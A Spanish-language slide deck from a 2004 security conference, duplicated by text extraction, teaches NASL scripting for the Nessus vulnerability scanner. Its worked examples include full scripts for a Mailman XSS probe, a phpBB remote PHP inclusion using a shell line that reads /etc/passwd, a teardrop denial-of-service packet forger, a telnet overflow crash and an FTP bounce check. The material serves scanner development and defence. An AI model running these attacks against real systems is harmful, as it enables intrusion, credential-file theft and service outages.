NASL

FIST Conference Abril 2004

NASLNASLlenguaje de desarrollo de exploitslenguaje de desarrollo de exploits

Rafael San Miguel CarrascoRafael San Miguel Carrasco


Tareas típicas del Tareas típicas del exploit devexploit dev ::

•• escribir las cabeceras de un datagrama IPescribir las cabeceras de un datagrama IP•• implementar un diálogo HTTPimplementar un diálogo HTTP•• capturar y procesar paquetes en modo capturar y procesar paquetes en modo

promiscuopromiscuo•• existencia de un fichero en un servidorexistencia de un fichero en un servidor•• comprobación de desbordamientoscomprobación de desbordamientos


Contenido:Contenido:

1) NASL, Nessus, Knowledge Base1) NASL, Nessus, Knowledge Base2) Sintaxis del lenguaje NASL2) Sintaxis del lenguaje NASL3) Librería de funciones3) Librería de funciones4) Ejemplos de programación4) Ejemplos de programación5) Consideraciones finales5) Consideraciones finales


Nessus:Nessus:

•• Escáner de vulnerabilidadesEscáner de vulnerabilidades•• Libre distribuciónLibre distribución•• Entornos UNIXEntornos UNIX•• www.nessus.orgwww.nessus.org•• Para ampliar su capacidad: NASLPara ampliar su capacidad: NASL

NASL = Nessus Attack Scripting LanguageNASL = Nessus Attack Scripting Language


Modelo cliente / servidor:Modelo cliente / servidor:

hostnessusd

nessus

nessus

nessus

hosthost


Lanzamos el cliente Nessus:Lanzamos el cliente Nessus:


Selección de Selección de pluginsplugins::


Fijamos algunas opciones:Fijamos algunas opciones:


Rango de direcciones IP:Rango de direcciones IP:


Iniciamos el Iniciamos el scanscan::


Informe de vulnerabilidades:Informe de vulnerabilidades:


Intérprete NASL:Intérprete NASL:

•• nasl nasl ––t 192.168.0.128 script.naslt 192.168.0.128 script.nasl•• previamente lanzamos previamente lanzamos nessusdnessusd•• sólo direcciones IP permitidassólo direcciones IP permitidas•• políticas: políticas: nessusd.rulesnessusd.rules y y nessusd.usersnessusd.users


Intérprete NASL:Intérprete NASL:

•• nasl nasl ––t 192.168.0.128 script.naslt 192.168.0.128 script.nasl•• previamente lanzamos previamente lanzamos nessusdnessusd•• sólo direcciones IP permitidassólo direcciones IP permitidas•• políticas: políticas: nessusd.rulesnessusd.rules y y nessusd.usersnessusd.users


plugin plugin malicioso:malicioso:

hostnessusd

nessus

nessus

nessus

hosthost

script malicioso

atacante

reporte de vulnerabilidad


Otra restricción:Otra restricción:

•• NASL no permite la ejecución de comandosNASL no permite la ejecución de comandoslocaleslocales

•• No puede utilizarse para escribir No puede utilizarse para escribir exploitsexploitsde ámbito localde ámbito local


Knowledge BaseKnowledge Base::

•• base de datos para cada base de datos para cada hosthost•• datos relevantes para los datos relevantes para los scriptsscripts•• set_kb_item ()set_kb_item ()•• get_kb_item ()get_kb_item ()


Atributos de la clase Atributos de la clase ServicesServices::

•• Services/wwwServices/www•• Services/ftpServices/ftp•• Services/http_proxyServices/http_proxy•• Services/imapServices/imap•• ......


Atributos de la clase Atributos de la clase HostHost::

•• Host/OSHost/OS•• Host/deadHost/dead

•• modificado por modificado por scripts scripts de ataques DoSde ataques DoS


Otros atributos:Otros atributos:

•• ftp/anonymousftp/anonymous•• www/frontpagewww/frontpage•• rpc/bootparamdrpc/bootparamd•• bind/versionbind/version•• ftp/root_via_cwdftp/root_via_cwd•• ......


Sintaxis: estructuras de controlSintaxis: estructuras de control

•• if (condición) { instr.} else { instr. }if (condición) { instr.} else { instr. }•• for (inic; condición; instr) { instr. }for (inic; condición; instr) { instr. }•• while (condición) { instr. }while (condición) { instr. }•• foreach elemento (array) { instr. }foreach elemento (array) { instr. }•• repeat { instr. } until (condición);repeat { instr. } until (condición);•• operador x:operador x:

•• send_packet (udp) x 30send_packet (udp) x 30


Sintaxis: tipos de datosSintaxis: tipos de datos

•• No se manejan explícitamente (Perl)No se manejan explícitamente (Perl)•• Asignaciones:Asignaciones:

•• a = 100;a = 100;•• nombre = “Rafael”;nombre = “Rafael”;•• bytes = raw_string (0x41, 0x01, 0xFF);bytes = raw_string (0x41, 0x01, 0xFF);

•• ¡No hay estructuras de datos!¡No hay estructuras de datos!


Sintaxis: Sintaxis: arraysarrays

•• a [1] = 450;a [1] = 450;•• b = “cadena”;b = “cadena”;•• if (b [2] == “a”)if (b [2] == “a”)•• if (a [1] == 450)if (a [1] == 450)•• Caso 1 : b [2] = “o”;Caso 1 : b [2] = “o”;•• Caso 2 : b = insstr (b, “o”, 1, 1);Caso 2 : b = insstr (b, “o”, 1, 1);


Sintaxis: funcionesSintaxis: funciones

•• posibilidad de definir funcionesposibilidad de definir funciones•• existen limitaciones en la llamada a lasexisten limitaciones en la llamada a las

funciones definidas por el programadorfunciones definidas por el programador•• sintaxis: sintaxis:

function suma (a, b) function suma (a, b) { { instr.instr.

return (valor);return (valor);}}


Sintaxis: funciones no anónimasSintaxis: funciones no anónimas

•• no importa el orden y número de argumentosno importa el orden y número de argumentosespecificados en la llamadaespecificados en la llamada

•• debe indicarse el nombre de los argumentos:debe indicarse el nombre de los argumentos:send (data: “hola”, socket: s);send (data: “hola”, socket: s);

•• si faltan datos: se solicitan en tiempo desi faltan datos: se solicitan en tiempo deejecuciónejecución


Librería de funciones: clasificaciónLibrería de funciones: clasificación

•• manipulación de cadenasmanipulación de cadenas•• socketssockets•• raw socketsraw sockets•• protocolos http, ftp, telnetprotocolos http, ftp, telnet•• funciones criptográficasfunciones criptográficas•• funciones “vínculo” con Nessus funciones “vínculo” con Nessus


Funciones: manipulación de cadenasFunciones: manipulación de cadenas

•• operadores ==, <, >operadores ==, <, >•• operador ><operador ><

•• if (“Access denied” >< respuesta)if (“Access denied” >< respuesta)•• ereg ()ereg () y y egrep ()egrep () para para pattern matchingpattern matching•• crap : crap : para testear desbordamientospara testear desbordamientos

•• crap (length: 1000, data: “bla”);crap (length: 1000, data: “bla”);


Funciones: Funciones: socketssockets

•• send (), recv ()send (), recv () sin dirección IP destinosin dirección IP destino•• recv_line (recv_line (socket: s, length: 100, timeout: 5socket: s, length: 100, timeout: 5););•• get_port_state (port)get_port_state (port)•• tcp_ping ()tcp_ping ()•• open_priv_sock_udp (srcport, dstport)open_priv_sock_udp (srcport, dstport)

•• flag flag MSG_OOB en MSG_OOB en send () send () ¿Por qué?¿Por qué?


Funciones: Funciones: raw socketsraw sockets

•• protocolos soportados:protocolos soportados:ICMP, IGMP, TCP, UDP, IPICMP, IGMP, TCP, UDP, IP

•• funciones funciones forge_X_packet ()forge_X_packet ()•• pcap_next ()pcap_next ()•• funciones funciones get_X_elements ()get_X_elements ()•• insert_ip_options ()insert_ip_options ()•• send_packet ()send_packet ()


Funciones: http, ftp, telnetFunciones: http, ftp, telnet

•• ftp_log_in (usuario, password)ftp_log_in (usuario, password)•• telnet_init ()telnet_init ()•• http_get (), http_post (), http_head (), ...http_get (), http_post (), http_head (), ...•• is_cgi_installed (“/cgiis_cgi_installed (“/cgi--bin/search.cgi”)bin/search.cgi”)•• cgi_dirs ()cgi_dirs ()

http_get (port: 80, item: “/cgihttp_get (port: 80, item: “/cgi--bin/search.cgi”, bin/search.cgi”, data: “query=hola”);data: “query=hola”);

¡No podemos simular servidores!¡No podemos simular servidores!


Funciones: criptográficasFunciones: criptográficas

•• digests MD2, MD4, MD5digests MD2, MD4, MD5•• digest SHAdigest SHA--11•• digest cifrado HMACdigest cifrado HMAC

HMAC_DSS, HMAC_MD2, HMAC_MD4,HMAC_DSS, HMAC_MD2, HMAC_MD4,HMAC_MD5, HMAC_RIPEMD160, ...HMAC_MD5, HMAC_RIPEMD160, ...


Funciones: integración con NessusFunciones: integración con Nessus

•• script_category ()script_category ()•• script_family ()script_family ()•• script_bugtraq_id ()script_bugtraq_id ()•• script_cve_id ()script_cve_id ()•• script_dependencies ()script_dependencies ()


Funciones: integración con NessusFunciones: integración con Nessus

•• security_hole (descr., puerto)security_hole (descr., puerto)•• security_warning (descr., puerto)security_warning (descr., puerto)•• security_note (descr., puerto)security_note (descr., puerto)


Ejemplo: XSS en MailmanEjemplo: XSS en Mailman

Pasos:Pasos:•• comprobar la existencia del comprobar la existencia del scriptscript

vulnerablevulnerable•• enviar petición GET con códigoenviar petición GET con código

HTML/JavascriptHTML/Javascript•• comprobar respuesta del servidorcomprobar respuesta del servidor


Ejemplo: XSS en MailmanEjemplo: XSS en Mailmanpuerto = 80;puerto = 80;cadena = "<script>alert(document.domain)</script>";cadena = "<script>alert(document.domain)</script>";url = "/cgiurl = "/cgi--bin/listinfo";bin/listinfo";

display ("display ("\\nMailman XSS bug testnMailman XSS bug test\\nn----------------------------------------\\n");n");

if (is_cgi_installed (url, puerto) ) {if (is_cgi_installed (url, puerto) ) {

display ("info: listinfo existe en la version de mailman instaladisplay ("info: listinfo existe en la version de mailman instaladada\\n");n");

socket = open_sock_tcp (puerto);socket = open_sock_tcp (puerto);peticion = http_get (item : "/cgipeticion = http_get (item : "/cgi--bin/listinfo/" + cadena, port : puerto);bin/listinfo/" + cadena, port : puerto);rsend = send (socket : socket, data : peticion);rsend = send (socket : socket, data : peticion);rrecv = recv (socket : socket, length : 32000);rrecv = recv (socket : socket, length : 32000);close(socket);close(socket);


Ejemplo: XSS en MailmanEjemplo: XSS en Mailmanif (cadena >< rrecv)if (cadena >< rrecv)

{ { display ("info: esta version de mailman es vulnerable a XSSdisplay ("info: esta version de mailman es vulnerable a XSS\\nn\\n");n");

} else {} else {display ("info: version NO vulnerable de mailmandisplay ("info: version NO vulnerable de mailman\\nn\\n");n");

}}

return (0);return (0);}}

display ("mailman no esta instalado en el servidordisplay ("mailman no esta instalado en el servidor\\nn\\n");n");





Integración con Nessus:Integración con Nessus:•• bloque bloque ifif : registro en : registro en nessusdnessusdif(description)if(description)

{ {

script_name(english:"Mailman XSS bug test"); script_name(english:"Mailman XSS bug test"); script_description(english:"Comprobaciscript_description(english:"Comprobacióón del fallo de XSS en Mailman");n del fallo de XSS en Mailman");script_summary(english:script_summary(english:““PeticiPeticióón GET con cn GET con cóódigo HTML/JavaScript");digo HTML/JavaScript");script_category(ACT_ATTACK); script_family(english:"Misc."); script_category(ACT_ATTACK); script_family(english:"Misc."); script_copyright(english:"Rafael San Miguel Carrasco"); script_copyright(english:"Rafael San Miguel Carrasco"); exit(0);exit(0);

}}



Integración con Nessus:Integración con Nessus:•• notificacinotificacióón a Nessusn a Nessus

if (if (cadena >< rrecvcadena >< rrecv) ) { {

report = report = ““Mailman es vulnerable a XSS"; Mailman es vulnerable a XSS"; security_hole (port: 80, data:report); security_hole (port: 80, data:report);

} }

•• copiamos el .nasl copiamos el .nasl /usr/lib/nessus/plugins/usr/lib/nessus/plugins•• relanzamos relanzamos nessusdnessusd


Ejemplo: Inserción PHP en phpBBEjemplo: Inserción PHP en phpBB

•• servidor web propioservidor web propio•• shellshell PHP de PHP de www.planetwww.planet--sourcesource--code.code.comcom

<php passthru (<php passthru (‘‘cat /etc/passwdcat /etc/passwd’’) ?>) ?>



Pasos:Pasos:•• comprobar la existencia del PHPcomprobar la existencia del PHP

vulnerablevulnerable•• enviar petición GET con parámetrosenviar petición GET con parámetros

adecuadosadecuados•• verificar que en la respuesta del servidorverificar que en la respuesta del servidor

aparece la cadena “root”aparece la cadena “root”


Ejemplo: Inserción PHP en phpBBEjemplo: Inserción PHP en phpBBpuerto = 80;puerto = 80;cadena = "phpbb_root_path=http://www.solucionescadena = "phpbb_root_path=http://www.soluciones--seguras.com/&phpEx=php";seguras.com/&phpEx=php";url = "/album_portal.php";url = "/album_portal.php";

display ("display ("\\nphpBB Modified Insertion Bug TestnphpBB Modified Insertion Bug Test\\nn------------------------------------------------------\\n");n");

if (is_cgi_installed (url, puerto) ) {if (is_cgi_installed (url, puerto) ) {

display ("info: phpBB esta instalado en el servidor display ("info: phpBB esta instalado en el servidor \\n");n");

socket = open_sock_tcp (puerto);socket = open_sock_tcp (puerto);peticion = http_get (item : url + "?" peticion = http_get (item : url + "?" + cadena, port : puerto);+ cadena, port : puerto);rsend = send (socket : socket, data : peticion);rsend = send (socket : socket, data : peticion);rrecv = recv (socket : socket, length : 32000);rrecv = recv (socket : socket, length : 32000);close(socket);close(socket);


Ejemplo: Inserción PHP en phpBBEjemplo: Inserción PHP en phpBBif ("root" >< rrecv)if ("root" >< rrecv){{

display ("info: se ha conseguido el fichero /etcdisplay ("info: se ha conseguido el fichero /etc/passwd del servidor/passwd del servidor\\n");n");# pattern matching# pattern matching

display (egrep (pattern: "^root*", string: rrecv) );display (egrep (pattern: "^root*", string: rrecv) );display ("display ("\\nn\\n");n");

} else {} else {display ("info: la version no es vulnerabledisplay ("info: la version no es vulnerable\\nn\\n");n");

}}

return (0);return (0);}}




Integración con Nessus:Integración con Nessus:•• bloque bloque ifif de registro en de registro en nessusdnessusd•• llamada a llamada a security_hole ()security_hole () si el ataquesi el ataque

tiene tiene ééxitoxito•• copiamos el .nasl copiamos el .nasl /usr/lib/nessus/plugins/usr/lib/nessus/plugins•• relanzamos relanzamos nessusdnessusd



Ejemplo: Ejemplo: teardropteardrop

•• ataque DoS que afecta a los ataque DoS que afecta a los stacksstacksTCP/IP de algunos sistemas operativosTCP/IP de algunos sistemas operativos

•• fallo en el algoritmo de ensambladofallo en el algoritmo de ensamblado•• implementación del implementación del exploitexploit::

•• datagrama UDP 1:datagrama UDP 1:•• payload N bytes, offset 0, MF onpayload N bytes, offset 0, MF on

•• datagrama UDP 2:datagrama UDP 2:•• payload < N, offset < N, MF offpayload < N, offset < N, MF off


Ejemplo: Ejemplo: teardropteardropMAGIC = 2;MAGIC = 2;IPH = 20;IPH = 20;UDPH = 8;UDPH = 8;PADDING = 0x1c;PADDING = 0x1c;MAGIC = 0x3;MAGIC = 0x3;IP_ID = 242;IP_ID = 242;sport = 123;sport = 123;dport = 137;dport = 137;

LEN = IPH + UDPH + PADDING;LEN = IPH + UDPH + PADDING;

src = this_host();src = this_host();ip = forge_ip_packet(ip_v : 4,ip = forge_ip_packet(ip_v : 4,

ip_hl : 5,ip_hl : 5, ip_tos : 0,ip_tos : 0, ip_id : IP_ID,ip_id : IP_ID, ip_len : LEN,ip_len : LEN,ip_off : IP_MF,ip_off : IP_MF, ip_p : IPPROTO_UDP,ip_p : IPPROTO_UDP, ip_src : src,ip_src : src,ip_ttl : 0x40);ip_ttl : 0x40);


Ejemplo: Ejemplo: teardropteardropLEN = UDPH + PADDING;LEN = UDPH + PADDING;udp1 = forge_udp_packet(ip : ip,udp1 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport,uh_sport : sport, uh_dport : dport, uh_len : LEN);uh_len : LEN);

LEN = IPH + MAGIC + 1;LEN = IPH + MAGIC + 1;set_ip_elements(ip: ip, ip_len : LEN, ip_off : MAGIC);set_ip_elements(ip: ip, ip_len : LEN, ip_off : MAGIC);

LEN = UDPH + PADDING; LEN = UDPH + PADDING; udp2 = forge_udp_packet(ip : ip,udp2 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport, uh_sport : sport, uh_dport : dport, uh_len : LEN);uh_len : LEN);

start_denial();start_denial();send_packet(udp1,udp2, pcap_active:FALSE) x 500;send_packet(udp1,udp2, pcap_active:FALSE) x 500;alive = end_denial();alive = end_denial();

if(!alive) {if(!alive) {set_kb_item(name:"Host/dead", value:TRUE);set_kb_item(name:"Host/dead", value:TRUE);security_hole(0);security_hole(0);

}}


Ejemplo: Ejemplo: overflowoverflow en BFTelneten BFTelnet

•• nombre de usuario muy largonombre de usuario muy largo•• provoca la caprovoca la caíída del servicio telnetda del servicio telnet•• fallo tfallo tíípico de muchos otros servidorespico de muchos otros servidores

(ftp, pop3, ...)(ftp, pop3, ...)


Ejemplo: Ejemplo: overflowoverflow en BFTelneten BFTelnetport = get_kb_item ("Services/telnet");port = get_kb_item ("Services/telnet");if (!port) port = 23;if (!port) port = 23;if (get_port_state(port))if (get_port_state(port)) {{

soc = open_sock_tcp(port);soc = open_sock_tcp(port);if (soc)if (soc) {{

banner = telnet_init(soc);banner = telnet_init(soc);banner = string(banner, recv(socket:soc, length:1000));banner = string(banner, recv(socket:soc, length:1000));data = string(crap(4000), "data = string(crap(4000), "\\rr\\n");n");send(socket:soc, data:data);send(socket:soc, data:data);close(soc);close(soc);

soc2 = open_sock_tcp(port);soc2 = open_sock_tcp(port);if(!soc2)if(!soc2)

security_warning(port);security_warning(port);}}

}}


Ejemplo: Ejemplo: ftp bouncingftp bouncing

•• comando PORT para conexión de datoscomando PORT para conexión de datos(protocolo FTP)(protocolo FTP)

•• posibilidad de iniciar una conexiposibilidad de iniciar una conexióón con n con hosthost arbitrarioarbitrario

•• utilidad:utilidad:•• port scanningport scanning•• bypassbypass de las reglas de un de las reglas de un firewallfirewall


Ejemplo: Ejemplo: ftp bouncingftp bouncingport = get_kb_item("Services/ftp");port = get_kb_item("Services/ftp");if(!port)port = 21;if(!port)port = 21;

login = get_kb_item("ftp/login");login = get_kb_item("ftp/login");password = get_kb_item("ftp/password");password = get_kb_item("ftp/password");

if (login)if (login) {{soc = open_sock_tcp(port);soc = open_sock_tcp(port);if(soc) {if(soc) {

if(ftp_log_in(socket:soc, user:login, pass:password))if(ftp_log_in(socket:soc, user:login, pass:password)) {{command = string("PORT 66,88,91,109,0,21command = string("PORT 66,88,91,109,0,21\\n");n");send(socket:soc, data:command);send(socket:soc, data:command);code = recv(socket:soc, length:4);code = recv(socket:soc, length:4);if(code == "200 ") security_hole(port);if(code == "200 ") security_hole(port);

}}close(soc);close(soc);

}}}}


Consideraciones finales:Consideraciones finales:

•• soporte multilenguajesoporte multilenguajename["english"] = "BFTelnet DoS";name["english"] = "BFTelnet DoS";name["francais"]= "Dname["francais"]= "Dééni de service contre BFTelnet";ni de service contre BFTelnet";script_name(english:name["english"], script_name(english:name["english"],

francais:name["francais"]);francais:name["francais"]);

•• forkingforking automático y transparenteautomático y transparenteejemplo: dos puertos telnetejemplo: dos puertos telnet


Detección de WAPs con NASL:Detección de WAPs con NASL:www.tenablesecurity.com/white_papers/wap-id-nessus.pdf

Más información sobre NASL y Nessus:Más información sobre NASL y Nessus:www.nessus.org/documentation.html

Estas transparencias:Estas transparencias:www.soluciones-seguras.comwww.fistconference.org


Nuestra empresa: Soluciones SegurasNuestra empresa: Soluciones Seguras


¡Muchas gracias por venir!¡Muchas gracias por venir!

Date post:	26-Dec-2014
Category:	Technology
Upload:	conferencias-fist
View:	111 times
Download:	0 times

NASL

Technology